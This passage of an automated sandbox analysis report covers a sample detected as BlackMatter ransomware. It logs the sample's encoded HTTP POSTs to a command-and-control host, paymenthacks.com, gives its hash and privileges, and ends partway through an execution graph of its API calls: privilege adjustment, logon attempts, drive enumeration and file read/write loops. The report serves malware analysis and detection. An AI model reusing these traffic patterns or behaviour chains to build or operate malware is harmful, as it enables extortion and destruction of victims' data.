              2021-10-24 07:21:23 UTC0OUTData Raw: 72 49 4e 6b 68 69 65 3d 6e 36 75 7a 42 49 26 64 78 37 73 3d 69 70 59 70 34 33 68 31 71 46 4a 48 36 2b 72 37 34 2b 2b 2b 77 2b 79 49 43 66 4b 4c 76 35 59 6e 54 72 61 59 77 76 77 79 71 4a 46 50 72 2b 57 41 39 74 6a 2f 54 32 4d 74 57 59 79 6f 79 68 47 32 33 50 4c 30 4e 42 67 64 48 31 6b 75 6c 75 68 36 45 46 57 36 58 37 70 39 62 7a 75 71 7a 63 59 69 71 67 44 35 76 41 36 45 51 4d 6f 6a 72 75 65 70 70 50 34 4d 44 62 62 63 2f 6a 39 42 66 4b 70 64 78 65 4c 38 68 2f 72 69 64 69 6c 64 34 64 42 39 58 45 48 36 31 72 6a 76 32 35 7a 41 73 78 6d 69 51 32 41 58 63 75 45 78 53 31 56 6b 57 6e 41 78 4c 31 56 66 74 46 65 58 5a 59 69 35 68 43 4b 5a 54 53 54 30 53 2b 2f 68 4d 31 73 68 36 45 6d 36 61 34 73 46 43 55 43 67 6b 44 71 65 41 56 46 73 4c 50 76 32 48 47 63 6a 36 35 45
              Data Ascii: rINkhie=n6uzBI&dx7s=ipYp43h1qFJH6+r74+++w+yICfKLv5YnTraYwvwyqJFPr+WA9tj/T2MtWYyoyhG23PL0NBgdH1kuluh6EFW6X7p9bzuqzcYiqgD5vA6EQMojrueppP4MDbbc/j9BfKpdxeL8h/ridild4dB9XEH61rjv25zAsxmiQ2AXcuExS1VkWnAxL1VftFeXZYi5hCKZTST0S+/hM1sh6Em6a4sFCUCgkDqeAVFsLPv2HGcj65E
              2021-10-24 07:21:24 UTC1INHTTP/1.1 302 Found
              Date: Sun, 24 Oct 2021 07:21:23 GMT
              Server: Apache/2.4.25 (Debian)
              Set-Cookie: __tad=1635060084.7055840; expires=Wed, 22-Oct-2031 07:21:24 GMT; Max-Age=315360000
              Location: http://ww25.paymenthacks.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3fju3=SkxeAp3EGyy3E&fGep=oo79la8IfpgF2Pf&Ktpuhpgn=2pQNXS3RarpD2S&lzLC=HEaimaSUBS3zw0nFsZL&MNg=HhbZ8eK&subid1=20211024-1821-244d-afd2-7f2406ac953a
              Content-Length: 0
              Connection: close
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortProcess
              1192.168.2.349761103.224.212.222443C:\Users\user\Desktop\GlLHM7paoZ.exe
              TimestampkBytes transferredDirectionData
              2021-10-24 07:21:59 UTC1OUTPOST /?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPvT&NIzLa=KKD&Ww7uium=7kQVlcMRI0lz9zF5N&EOj3TrEzg=uXPRgqL6AtVMT&jOg2Kq=KbU1&OJqem=QGXs&Thxw591w=7AzVv38Ty&3Kwha=7J4&3JE702D5H=wVwVW&xj6Km=eIvB77L1DiRICecfvT&rn2cJrZbK=y6u&Wl1Wj=VXl8HkHvD8h6WgygV&jiC4MKl=PC3nWpKyNJUHfNNY&YdDNI5U=qZiZI0BeoLfimdx&DjiEcu=20b4Hh8Ch5v&tz2REARJ=zwNqtxhKtQaEpGWtM HTTP/1.1
              Accept: */*
              Connection: keep-alive
              Accept-Encoding: gzip, deflate, br
              Content-Type: text/plain
              User-Agent: AppleWebKit/587.38 (KHTML, like Gecko)
              Host: paymenthacks.com
              Content-Length: 665
              Cache-Control: no-cache
              Cookie: __tad=1635060084.7055840
              2021-10-24 07:21:59 UTC2OUTData Raw: 31 36 7a 4d 34 56 6f 3d 70 56 31 26 45 74 55 3d 47 46 39 70 65 70 67 6c 55 44 26 62 4d 78 51 3d 35 31 32 34 37 38 63 30 38 64 61 64 61 32 61 66 31 39 65 34 39 38 30 38 66 62 64 61 35 62 30 62 26 65 37 59 57 58 62 37 6c 78 3d 68 42 47 6b 69 55 54 64 61 43 26 75 59 68 63 45 33 66 6a 3d 4d 69 50 4b 6e 61 6f 4a 39 6b 64 61 62 30 26 48 73 30 7a 38 6b 4c 3d 48 4f 39 6a 65 48 78 37 48 41 38 43 32 7a 26 36 71 59 4d 49 45 3d 62 45 4b 39 4f 58 75 5a 74 42 26 41 59 4b 62 32 3d 66 6f 4b 38 61 43 58 74 49 79 4b 45 51 50 65 71 70 26 67 66 73 77 3d 35 66 46 47 78 74 6b 46 4f 62 74 6d 57 26 4f 32 45 75 62 3d 6e 6b 7a 50 31 34 5a 48 38 76 76 7a 26 52 45 70 59 3d 69 70 59 70 34 33 68 31 71 46 4a 48 36 2b 72 37 34 2b 2b 2b 77 2b 79 49 43 66 4b 4c 76 35 59 6e 54 72 61 59 77
              Data Ascii: 16zM4Vo=pV1&EtU=GF9pepglUD&bMxQ=512478c08dada2af19e49808fbda5b0b&e7YWXb7lx=hBGkiUTdaC&uYhcE3fj=MiPKnaoJ9kdab0&Hs0z8kL=HO9jeHx7HA8C2z&6qYMIE=bEK9OXuZtB&AYKb2=foK8aCXtIyKEQPeqp&gfsw=5fFGxtkFObtmW&O2Eub=nkzP14ZH8vvz&REpY=ipYp43h1qFJH6+r74+++w+yICfKLv5YnTraYw
              2021-10-24 07:21:59 UTC2INHTTP/1.1 302 Found
              Date: Sun, 24 Oct 2021 07:21:59 GMT
              Server: Apache/2.4.25 (Debian)
              Location: http://ww25.paymenthacks.com/?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPvT&NIzLa=KKD&Ww7uium=7kQVlcMRI0lz9zF5N&EOj3TrEzg=uXPRgqL6AtVMT&jOg2Kq=KbU1&OJqem=QGXs&Thxw591w=7AzVv38Ty&3Kwha=7J4&3JE702D5H=wVwVW&xj6Km=eIvB77L1DiRICecfvT&rn2cJrZbK=y6u&Wl1Wj=VXl8HkHvD8h6WgygV&jiC4MKl=PC3nWpKyNJUHfNNY&YdDNI5U=qZiZI0BeoLfimdx&DjiEcu=20b4Hh8Ch5v&tz2REARJ=zwNqtxhKtQaEpGWtM&subid1=20211024-1821-5994-88c3-3f09ef5a5c59
              Content-Length: 0
              Connection: close
              Content-Type: text/html; charset=UTF-8


              Code Manipulations

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              System Behavior

              General

              Start time:09:21:21
              Start date:24/10/2021
              Path:C:\Users\user\Desktop\GlLHM7paoZ.exe
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\Desktop\GlLHM7paoZ.exe'
              Imagebase:0x10f0000
              File size:68608 bytes
              MD5 hash:598C53BFEF81E489375F09792E487F1A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_blackmatter, Description: Yara detected BLACKMatter Ransomware, Source: 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_blackmatter, Description: Yara detected BLACKMatter Ransomware, Source: 00000000.00000003.279421242.00000000012FC000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_blackmatter, Description: Yara detected BLACKMatter Ransomware, Source: 00000000.00000002.359933097.00000000012FF000.00000004.00000001.sdmp, Author: Joe Security
              Reputation:low

              Disassembly

              Code Analysis

              Reset < >

                Execution Graph

                Execution Coverage:31.3%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:37.3%
                Total number of Nodes:1138
                Total number of Limit Nodes:4

                Graph

                execution_graph 6495 10fcb08 6496 10fc97f 6495->6496 6497 10f5fb3 GetPEB RtlFreeHeap 6496->6497 6498 10f60df 2 API calls 6496->6498 6499 10fcb9e 6496->6499 6506 10fc1b4 NtSetInformationThread 6496->6506 6507 10fc2e9 NtSetInformationThread 6496->6507 6508 10f8766 NtSetInformationThread 6496->6508 6497->6496 6498->6496 6501 10fcc02 6499->6501 6509 10f5fb3 GetPEB RtlFreeHeap 6499->6509 6502 10fcc10 6501->6502 6510 10f5fb3 GetPEB RtlFreeHeap 6501->6510 6504 10fcc1e 6502->6504 6511 10f5fb3 GetPEB RtlFreeHeap 6502->6511 6506->6496 6507->6496 6508->6496 6509->6501 6510->6502 6511->6504 6522 10fb41b 6523 10fb407 6522->6523 6524 10fb45f 6523->6524 6526 10f5fb3 GetPEB RtlFreeHeap 6523->6526 6526->6524 5098 10fe8d5 5107 10f5e5c 5098->5107 5102 10fe8e1 5145 10fd244 5102->5145 5104 10fe8e6 5181 10fe815 5104->5181 5204 10f581d 5107->5204 5110 10f5e78 HeapCreate 5111 10f5f95 5110->5111 5112 10f5e8d 5110->5112 5142 10f92e1 5111->5142 5113 10f581d 3 API calls 5112->5113 5114 10f5e9d 5113->5114 5114->5111 5214 10f5a86 5114->5214 5117 10f5a86 8 API calls 5118 10f5ec9 5117->5118 5119 10f5a86 8 API calls 5118->5119 5120 10f5eda 5119->5120 5121 10f5a86 8 API calls 5120->5121 5122 10f5eeb 5121->5122 5123 10f5a86 8 API calls 5122->5123 5124 10f5efc 5123->5124 5125 10f5a86 8 API calls 5124->5125 5126 10f5f0d 5125->5126 5127 10f5a86 8 API calls 5126->5127 5128 10f5f1e 5127->5128 5129 10f5a86 8 API calls 5128->5129 5130 10f5f2f 5129->5130 5131 10f5a86 8 API calls 5130->5131 5132 10f5f40 5131->5132 5133 10f5a86 8 API calls 5132->5133 5134 10f5f51 5133->5134 5135 10f5a86 8 API calls 5134->5135 5136 10f5f62 5135->5136 5137 10f5a86 8 API calls 5136->5137 5138 10f5f73 5137->5138 5139 10f5a86 8 API calls 5138->5139 5140 10f5f84 5139->5140 5141 10f5a86 8 API calls 5140->5141 5141->5111 5143 10f92f5 NtSetInformationThread 5142->5143 5143->5102 5146 10fd249 5145->5146 5159 10fd267 5146->5159 5243 10f155e GetPEB 5146->5243 5149 10fd276 5151 10fd284 5149->5151 5268 10f998d 5149->5268 5151->5104 5154 10fd290 5271 10f9524 5154->5271 5263 10f6438 5159->5263 5162 10fd2b4 5283 10f8731 5162->5283 5163 10fd2a3 5279 10f6812 5163->5279 5166 10fd2b2 5288 10f6568 5166->5288 5169 10fd2b9 5169->5166 5329 10f82bf 5169->5329 5170 10fd334 5170->5104 5175 10fd306 5175->5170 5355 10f5fb3 GetPEB RtlFreeHeap 5175->5355 5177 10fd31e 5356 10f5fb3 GetPEB RtlFreeHeap 5177->5356 5179 10fd329 5357 10f5fb3 GetPEB RtlFreeHeap 5179->5357 5441 10f163a GetPEB 5181->5441 5183 10fe822 5442 10f7dba 5183->5442 5186 10fe83b 5188 10fe8d1 31 API calls 5186->5188 5621 10f5fb3 GetPEB RtlFreeHeap 5186->5621 5187 10fe86f 5189 10fe875 5187->5189 5190 10fe8c2 5187->5190 5194 10fe899 5189->5194 5195 10fe8a2 5189->5195 5483 10fe677 5190->5483 5193 10fe846 5193->5186 5520 10fe032 5193->5520 5571 10fdfef 5194->5571 5198 10fe8b6 5195->5198 5199 10fe8a6 5195->5199 5446 10fe414 5198->5446 5585 10fdfa6 5199->5585 5205 10f582f 5204->5205 5206 10f5849 5204->5206 5208 10f581d 2 API calls 5205->5208 5207 10f5876 GetPEB 5206->5207 5209 10f581d 2 API calls 5206->5209 5212 10f588f 5207->5212 5208->5206 5210 10f5871 5209->5210 5210->5207 5211 10f590f 5211->5110 5211->5111 5212->5211 5220 10f57a7 5212->5220 5227 10f5928 5214->5227 5216 10f5a9b 5217 10f5aad 5216->5217 5218 10f581d 3 API calls 5216->5218 5217->5117 5219 10f5aba RtlAllocateHeap 5218->5219 5219->5216 5221 10f57c5 5220->5221 5222 10f57e8 LoadLibraryA 5221->5222 5223 10f5811 5221->5223 5222->5223 5224 10f57f9 5222->5224 5223->5212 5224->5223 5225 10f5802 GetProcAddress 5224->5225 5225->5223 5226 10f580e 5225->5226 5226->5223 5228 10f5942 5227->5228 5230 10f595c 5227->5230 5229 10f581d 3 API calls 5228->5229 5229->5230 5231 10f5984 5230->5231 5232 10f581d 3 API calls 5230->5232 5233 10f59ac 5231->5233 5234 10f581d 3 API calls 5231->5234 5232->5231 5235 10f581d 3 API calls 5233->5235 5239 10f59d4 5233->5239 5234->5233 5235->5239 5236 10f5a1f FindFirstFileW 5237 10f5a7c 5236->5237 5238 10f5a3a 5236->5238 5237->5216 5240 10f5a5f FindNextFileW 5238->5240 5241 10f5a4d LoadLibraryW 5238->5241 5239->5236 5240->5238 5242 10f5a73 FindClose 5240->5242 5241->5242 5242->5237 5244 10f1577 5243->5244 5244->5159 5245 10f931a 5244->5245 5246 10f932f 5245->5246 5248 10f93bd 5246->5248 5358 10f5f98 GetPEB RtlAllocateHeap 5246->5358 5248->5159 5251 10f98d9 5248->5251 5249 10f936c 5249->5248 5359 10f5fb3 GetPEB RtlFreeHeap 5249->5359 5252 10f98ee 5251->5252 5253 10f9983 5252->5253 5360 10f1647 GetPEB 5252->5360 5253->5159 5255 10f98fe 5361 10f163a GetPEB 5255->5361 5257 10f9906 5362 10f95d6 5257->5362 5259 10f990e 5259->5253 5366 10f7d22 5259->5366 5372 10f6245 5263->5372 5267 10f6457 5267->5149 5380 10f5f98 GetPEB RtlAllocateHeap 5268->5380 5270 10f999e 5270->5154 5272 10f9535 5271->5272 5273 10f953c RtlAdjustPrivilege 5272->5273 5274 10f953a 5272->5274 5273->5272 5275 10f9494 5274->5275 5276 10f94ab 5275->5276 5277 10f94af NtQueryInformationToken 5276->5277 5278 10f94c8 5276->5278 5277->5278 5278->5162 5278->5163 5280 10f6869 5279->5280 5281 10f155e GetPEB 5280->5281 5282 10f68a1 5281->5282 5282->5166 5381 10f7ea7 5283->5381 5285 10f874e 5286 10f875c 5285->5286 5392 10f7f4c 5285->5392 5286->5169 5400 10f64cc 5288->5400 5290 10f6580 5291 10f67b9 5290->5291 5403 10f5f98 GetPEB RtlAllocateHeap 5290->5403 5291->5170 5313 10f85c8 5291->5313 5293 10f67b1 5413 10f5fb3 GetPEB RtlFreeHeap 5293->5413 5296 10f659d 5296->5293 5297 10f661d 5296->5297 5312 10f678a 5296->5312 5404 10f5f98 GetPEB RtlAllocateHeap 5296->5404 5298 10f6650 5297->5298 5405 10f5f98 GetPEB RtlAllocateHeap 5297->5405 5304 10f6683 5298->5304 5406 10f5f98 GetPEB RtlAllocateHeap 5298->5406 5302 10f671c 5308 10f6753 5302->5308 5410 10f5f98 GetPEB RtlAllocateHeap 5302->5410 5305 10f66b6 5304->5305 5407 10f5f98 GetPEB RtlAllocateHeap 5304->5407 5310 10f66e9 5305->5310 5408 10f5f98 GetPEB RtlAllocateHeap 5305->5408 5308->5312 5411 10f5f98 GetPEB RtlAllocateHeap 5308->5411 5310->5302 5409 10f5f98 GetPEB RtlAllocateHeap 5310->5409 5412 10f5fb3 GetPEB RtlFreeHeap 5312->5412 5314 10f85e6 5313->5314 5415 10f5f98 GetPEB RtlAllocateHeap 5314->5415 5316 10f8727 5316->5170 5349 10f93d7 5316->5349 5317 10f85f1 5317->5316 5416 10f5fb3 GetPEB RtlFreeHeap 5317->5416 5319 10f864c LogonUserW 5320 10f8612 5319->5320 5321 10f8674 5319->5321 5320->5319 5322 10f86fa 5320->5322 5417 10f64fa 5321->5417 5420 10f5fb3 GetPEB RtlFreeHeap 5322->5420 5324 10f8694 5326 10f64fa 2 API calls 5324->5326 5327 10f86db 5326->5327 5328 10f64fa 2 API calls 5327->5328 5328->5322 5330 10f155e GetPEB 5329->5330 5331 10f830a 5330->5331 5344 10f84c0 5331->5344 5422 10f807e 5331->5422 5333 10f8318 5334 10f851b 5333->5334 5335 10f8406 5333->5335 5333->5344 5337 10f64cc 2 API calls 5334->5337 5334->5344 5336 10f64cc 2 API calls 5335->5336 5335->5344 5338 10f8439 5336->5338 5339 10f854a 5337->5339 5338->5344 5432 10f5fb3 GetPEB RtlFreeHeap 5338->5432 5339->5344 5434 10f5fb3 GetPEB RtlFreeHeap 5339->5434 5342 10f8568 GetPEB 5342->5344 5343 10f845b GetPEB 5345 10f8494 5343->5345 5344->5166 5345->5344 5346 10f64cc 2 API calls 5345->5346 5347 10f84a2 5346->5347 5347->5344 5433 10f5fb3 GetPEB RtlFreeHeap 5347->5433 5350 10f93ec 5349->5350 5352 10f947a 5350->5352 5439 10f5f98 GetPEB RtlAllocateHeap 5350->5439 5352->5175 5354 10f9429 5354->5352 5440 10f5fb3 GetPEB RtlFreeHeap 5354->5440 5355->5177 5356->5179 5357->5170 5358->5249 5359->5248 5360->5255 5361->5257 5363 10f9602 5362->5363 5364 10f96ef GetPEB 5363->5364 5365 10f970d 5363->5365 5364->5365 5365->5259 5367 10f7d34 5366->5367 5369 10f7d5c 5366->5369 5371 10f5f98 GetPEB RtlAllocateHeap 5367->5371 5370 10f5fb3 GetPEB RtlFreeHeap 5369->5370 5370->5253 5371->5369 5373 10f62cc 5372->5373 5373->5373 5374 10f6315 RegCreateKeyExW 5373->5374 5375 10f633b RegQueryValueExW 5374->5375 5376 10f638a 5374->5376 5377 10f636b 5375->5377 5378 10f6381 NtClose 5375->5378 5376->5267 5379 10f5f98 GetPEB RtlAllocateHeap 5376->5379 5377->5378 5378->5376 5379->5267 5380->5270 5396 10f5f98 GetPEB RtlAllocateHeap 5381->5396 5383 10f7ec8 NtQuerySystemInformation 5385 10f7ec5 5383->5385 5389 10f7ede 5383->5389 5384 10f7efb 5398 10f5fb3 GetPEB RtlFreeHeap 5384->5398 5385->5383 5385->5384 5397 10f5fce GetPEB RtlReAllocateHeap 5385->5397 5388 10f7f03 5388->5285 5399 10f5fb3 GetPEB RtlFreeHeap 5389->5399 5391 10f7f41 5391->5285 5395 10f7f71 5392->5395 5393 10f8037 NtClose 5394 10f8040 5393->5394 5394->5286 5395->5393 5395->5394 5396->5385 5397->5385 5398->5388 5399->5391 5414 10f5f98 GetPEB RtlAllocateHeap 5400->5414 5402 10f64dc 5402->5290 5403->5296 5404->5297 5405->5298 5406->5304 5407->5305 5408->5310 5409->5302 5410->5308 5411->5312 5412->5293 5413->5291 5414->5402 5415->5317 5416->5320 5421 10f5f98 GetPEB RtlAllocateHeap 5417->5421 5419 10f650b 5419->5324 5420->5316 5421->5419 5435 10f5f98 GetPEB RtlAllocateHeap 5422->5435 5424 10f809c 5425 10f80d2 5424->5425 5431 10f80b5 5424->5431 5436 10f5fce GetPEB RtlReAllocateHeap 5424->5436 5437 10f5fb3 GetPEB RtlFreeHeap 5425->5437 5428 10f80da 5428->5333 5430 10f81ff 5430->5333 5438 10f5fb3 GetPEB RtlFreeHeap 5431->5438 5432->5343 5433->5344 5434->5342 5435->5424 5436->5424 5437->5428 5438->5430 5439->5354 5440->5352 5441->5183 5443 10f7e65 5442->5443 5444 10f7dd0 5442->5444 5443->5186 5443->5187 5443->5193 5444->5443 5622 10f6035 5444->5622 5447 10f6035 2 API calls 5446->5447 5482 10fe42c 5447->5482 5449 10fe5b2 5652 10f5fb3 GetPEB RtlFreeHeap 5449->5652 5451 10fe4c7 5632 10f5fb3 GetPEB RtlFreeHeap 5451->5632 5452 10f89ca NtSetInformationThread 5452->5482 5453 10fe4b2 5453->5186 5455 10fe4da 5633 10f8b23 5455->5633 5456 10fe4aa 5627 10f5fb3 GetPEB RtlFreeHeap 5456->5627 5457 10fe5e7 5459 10f6083 2 API calls 5457->5459 5464 10fe64a 5459->5464 5461 10fe4fe 5465 10fe566 5461->5465 5466 10fe570 5461->5466 5462 10fe5c5 5462->5457 5467 10fe5da 5462->5467 5654 10f5fb3 GetPEB RtlFreeHeap 5464->5654 5638 10f6083 5465->5638 5642 10f6173 5466->5642 5653 10f5fb3 GetPEB RtlFreeHeap 5467->5653 5468 10fe4f1 5637 10f5fb3 GetPEB RtlFreeHeap 5468->5637 5474 10fe653 5474->5453 5477 10fcf4c 11 API calls 5474->5477 5475 10fe56e 5646 10f5fb3 GetPEB RtlFreeHeap 5475->5646 5477->5453 5478 10f9249 NtSetInformationThread 5478->5482 5479 10fe581 5479->5453 5647 10fcf4c 5479->5647 5481 10f5fb3 GetPEB RtlFreeHeap 5481->5482 5482->5449 5482->5451 5482->5452 5482->5453 5482->5455 5482->5456 5482->5457 5482->5461 5482->5462 5482->5478 5482->5481 5628 10f8a82 5482->5628 5484 10fe6ce 5483->5484 5485 10fe687 5483->5485 5487 10fe6d7 CreateThread 5484->5487 5491 10fe6f5 5484->5491 5676 10f750f 5485->5676 5487->5491 6131 10faeee 5487->6131 5684 10f69c4 GetLogicalDriveStringsW 5491->5684 5493 10fe70a 5496 10fe718 5493->5496 5691 10f724f OpenSCManagerW 5493->5691 5494 10fe6a8 5494->5186 5495 10fe6b6 CreateMutexW 5681 10f6022 5495->5681 5499 10fe726 5496->5499 5697 10f73c1 5496->5697 5708 10f9554 5499->5708 5503 10fb790 10 API calls 5504 10fe746 5503->5504 5505 10fe762 5504->5505 5507 10fe770 5504->5507 5714 10f8dc6 5504->5714 5505->5507 5749 10fc8c1 5505->5749 5510 10fe7ce 5507->5510 5772 10fb06a 5507->5772 5512 10fe7fb 5510->5512 5513 10fe804 5510->5513 5514 10f7612 17 API calls 5512->5514 5787 10fdd6f 5513->5787 5516 10fe802 5514->5516 5516->5186 5521 10f6035 2 API calls 5520->5521 5522 10fe04a 5521->5522 5523 10fe06c 5522->5523 5524 10fe07b 5522->5524 5539 10fe0e3 5522->5539 6302 10fcc27 5523->6302 6330 10f6983 GetPEB 5524->6330 5528 10fe0c0 5529 10fe0db 5528->5529 5531 10fe0f8 5528->5531 5532 10f5f98 GetPEB RtlAllocateHeap 5528->5532 5534 10fe16c 5528->5534 5535 10f8a82 NtSetInformationThread 5528->5535 5536 10fe34f 5528->5536 5528->5539 5540 10fe264 5528->5540 5541 10fe277 5528->5541 5542 10f89ca NtSetInformationThread 5528->5542 5544 10fe247 5528->5544 5545 10fe384 5528->5545 5546 10fe362 5528->5546 5550 10fe29b 5528->5550 5563 10f5fb3 GetPEB RtlFreeHeap 5528->5563 5569 10f9249 NtSetInformationThread 5528->5569 6338 10f9019 5528->6338 6335 10f5fb3 GetPEB RtlFreeHeap 5529->6335 6336 10f5fb3 GetPEB RtlFreeHeap 5531->6336 5532->5528 6337 10f5fb3 GetPEB RtlFreeHeap 5534->6337 5535->5528 6348 10f5fb3 GetPEB RtlFreeHeap 5536->6348 5539->5186 6345 10f5fb3 GetPEB RtlFreeHeap 5540->6345 5547 10f8b23 NtSetInformationThread 5541->5547 5542->5528 6344 10f5fb3 GetPEB RtlFreeHeap 5544->6344 5548 10f6083 2 API calls 5545->5548 5546->5545 5551 10fe377 5546->5551 5552 10fe28a 5547->5552 5554 10fe3e7 5548->5554 5555 10fe30d 5550->5555 5556 10fe303 5550->5556 6349 10f5fb3 GetPEB RtlFreeHeap 5551->6349 5552->5550 5558 10fe28e 5552->5558 6350 10f5fb3 GetPEB RtlFreeHeap 5554->6350 5561 10f6173 2 API calls 5555->5561 5560 10f6083 2 API calls 5556->5560 6346 10f5fb3 GetPEB RtlFreeHeap 5558->6346 5565 10fe30b 5560->5565 5561->5565 5563->5528 5564 10fe3f0 5564->5539 5568 10fcf4c 11 API calls 5564->5568 6347 10f5fb3 GetPEB RtlFreeHeap 5565->6347 5567 10fe31e 5567->5539 5570 10fcf4c 11 API calls 5567->5570 5568->5539 5569->5528 5570->5539 5572 10fdff4 5571->5572 5573 10fe031 5572->5573 6363 10fd8bf 5572->6363 5573->5186 5582 10f7612 17 API calls 5583 10fe02a 5582->5583 5584 10fdb69 5 API calls 5583->5584 5584->5573 5586 10f155e GetPEB 5585->5586 5587 10fdfad 5586->5587 6464 10fdf10 5587->6464 5589 10fdfc5 5590 10f7612 5589->5590 5591 10f766c 5590->5591 5592 10f7675 5591->5592 5595 10fd34b 3 API calls 5591->5595 5593 10f7ccd 5592->5593 6480 10f5fb3 GetPEB RtlFreeHeap 5592->6480 5596 10f7cdb 5593->5596 6481 10f5fb3 GetPEB RtlFreeHeap 5593->6481 5598 10f76c1 5595->5598 5596->5186 5598->5592 6478 10f5f98 GetPEB RtlAllocateHeap 5598->6478 5600 10f77ac 5600->5592 5601 10f64cc 2 API calls 5600->5601 5602 10f77c4 5601->5602 5602->5592 5603 10f77ed 5602->5603 5604 10f7801 GetTextExtentPoint32W 5602->5604 6479 10f5fb3 GetPEB RtlFreeHeap 5603->6479 5604->5592 5606 10f781b 5604->5606 5606->5592 5607 10f7882 DrawTextW 5606->5607 5607->5592 5608 10f78c3 5607->5608 5608->5592 5608->5608 5609 10f7a06 CreateFileW 5608->5609 5609->5592 5610 10f7a2f WriteFile 5609->5610 5610->5592 5611 10f7a50 WriteFile 5610->5611 5611->5592 5612 10f7a6e WriteFile 5611->5612 5612->5592 5613 10f7a8c 5612->5613 5614 10f6393 3 API calls 5613->5614 5615 10f7aae 5614->5615 5615->5592 5616 10f7b3a RegCreateKeyExW 5615->5616 5616->5592 5617 10f7b6b RegSetValueExW 5616->5617 5617->5592 5619 10f7bda RegSetValueExW 5617->5619 5619->5592 5621->5188 5623 10f604b 5622->5623 5624 10f6062 5623->5624 5626 10f5f98 GetPEB RtlAllocateHeap 5623->5626 5624->5443 5626->5624 5627->5453 5629 10f8aa5 5628->5629 5631 10f8abf 5629->5631 5655 10f8766 5629->5655 5631->5482 5632->5453 5634 10f8b46 5633->5634 5635 10f8766 NtSetInformationThread 5634->5635 5636 10f8b60 5634->5636 5635->5636 5636->5461 5636->5468 5637->5453 5639 10f609b 5638->5639 5640 10f60b1 5639->5640 5659 10f5f98 GetPEB RtlAllocateHeap 5639->5659 5640->5475 5643 10f618c 5642->5643 5645 10f61a2 5643->5645 5660 10f5f98 GetPEB RtlAllocateHeap 5643->5660 5645->5475 5646->5479 5661 10fb790 GetPEB 5647->5661 5650 10f8766 NtSetInformationThread 5651 10fcf9f 5650->5651 5651->5453 5652->5453 5653->5453 5654->5474 5656 10f8775 5655->5656 5657 10f8778 5655->5657 5656->5631 5657->5656 5658 10f87bf NtSetInformationThread 5657->5658 5658->5656 5659->5640 5660->5645 5662 10fb7c7 5661->5662 5663 10fb805 5662->5663 5664 10fb7d5 CreateThread 5662->5664 5665 10f92e1 NtSetInformationThread 5662->5665 5663->5650 5663->5651 5664->5662 5667 10fb497 5664->5667 5666 10fb7f6 NtClose 5665->5666 5666->5662 5668 10fb4a3 SetThreadPriority 5667->5668 5669 10fb4ac 5668->5669 5670 10fb50e ReadFile 5669->5670 5671 10fb679 WriteFile 5669->5671 5672 10fb600 WriteFile 5669->5672 5673 10fb4ff 5669->5673 5675 10f5fb3 GetPEB RtlFreeHeap 5669->5675 5670->5669 5671->5669 5672->5669 5675->5669 5677 10f6245 3 API calls 5676->5677 5679 10f7526 5677->5679 5678 10f75e8 5678->5494 5678->5495 5679->5678 5810 10f5fec 5679->5810 5815 10f5fb3 GetPEB RtlFreeHeap 5681->5815 5683 10f6031 5683->5484 5685 10f6a0d 5684->5685 5686 10f69e5 5684->5686 5689 10f6d7e CoInitialize 5685->5689 5686->5685 5687 10f69ee GetDriveTypeW 5686->5687 5816 10f6a11 5686->5816 5687->5686 5690 10f6db3 5689->5690 5690->5493 5692 10f727d 5691->5692 5696 10f72ac 5691->5696 5855 10f5f98 GetPEB RtlAllocateHeap 5692->5855 5693 10f7360 5693->5496 5696->5693 5856 10f5fb3 GetPEB RtlFreeHeap 5696->5856 5857 10f5f98 GetPEB RtlAllocateHeap 5697->5857 5699 10f73d8 5700 10f73db NtQuerySystemInformation 5699->5700 5701 10f740e 5699->5701 5858 10f5fce GetPEB RtlReAllocateHeap 5699->5858 5700->5699 5707 10f73f1 5700->5707 5859 10f5fb3 GetPEB RtlFreeHeap 5701->5859 5704 10f7416 5704->5499 5706 10f74a9 5706->5499 5860 10f5fb3 GetPEB RtlFreeHeap 5707->5860 5709 10f5fec 2 API calls 5708->5709 5710 10f955c 5709->5710 5711 10f958f 5710->5711 5712 10f9562 NtSetInformationProcess NtSetInformationProcess 5710->5712 5711->5503 5713 10f6022 2 API calls 5712->5713 5713->5711 5715 10f8deb FindFirstVolumeW 5714->5715 5716 10f900a 5715->5716 5723 10f8e07 5715->5723 5724 10fd009 5716->5724 5717 10f8e20 GetVolumePathNamesForVolumeNameW 5717->5723 5718 10f8e51 GetDriveTypeW 5718->5723 5719 10f155e GetPEB 5719->5723 5720 10f8ef6 CreateFileW 5721 10f8f1c DeviceIoControl 5720->5721 5720->5723 5721->5723 5722 10f8d3a NtSetInformationThread GetLogicalDriveStringsW CreateThread ResumeThread GetExitCodeThread 5722->5723 5723->5716 5723->5717 5723->5718 5723->5719 5723->5720 5723->5722 5861 10f153e GetPEB 5724->5861 5728 10fd030 5747 10fd036 5728->5747 5871 10f5f98 GetPEB RtlAllocateHeap 5728->5871 5730 10fd21f 5733 10fd22d 5730->5733 5883 10f5fb3 GetPEB RtlFreeHeap 5730->5883 5731 10fd048 5734 10f8bc9 5 API calls 5731->5734 5731->5747 5736 10fd23b 5733->5736 5884 10f5fb3 GetPEB RtlFreeHeap 5733->5884 5737 10fd065 5734->5737 5736->5505 5737->5747 5872 10f5f98 GetPEB RtlAllocateHeap 5737->5872 5740 10fd080 5740->5747 5873 10f5f98 GetPEB RtlAllocateHeap 5740->5873 5743 10fd09b 5744 10f6083 2 API calls 5743->5744 5746 10f6083 2 API calls 5743->5746 5743->5747 5748 10f8766 NtSetInformationThread 5743->5748 5874 10f890b CreateThread 5743->5874 5745 10fd0ed CreateThread 5744->5745 5745->5743 5887 10fbf33 GetFileAttributesW 5745->5887 5746->5743 5747->5730 5882 10f5fb3 GetPEB RtlFreeHeap 5747->5882 5748->5743 5750 